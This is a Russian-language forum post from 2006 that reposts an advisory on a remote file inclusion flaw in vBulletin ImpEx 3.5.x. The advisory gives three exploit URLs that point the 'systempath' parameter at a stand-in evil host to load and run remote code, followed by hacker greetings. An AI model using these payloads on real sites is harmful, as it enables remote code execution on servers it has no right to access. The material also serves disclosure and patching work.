20.04.2006, 22:37
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами:
11087066
Репутация:
561
|
|
Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
Код:
Remote File Inclusion in VBulletin ImpEx
Date :
12 / 4 / 2006
Software :
VBulletin ImpEx
version :
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
The bug reside in :
ImpExModule.php
ImpExController.php
ImpExDisplay.php
Exploit :
(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
Discovery by :
Dr.Jr7
GreeTz :
special greet to Qptan & Mr.SNAKE & trooq
and to my all frinds in www.lezr.com/vb
see u :}
|
|
|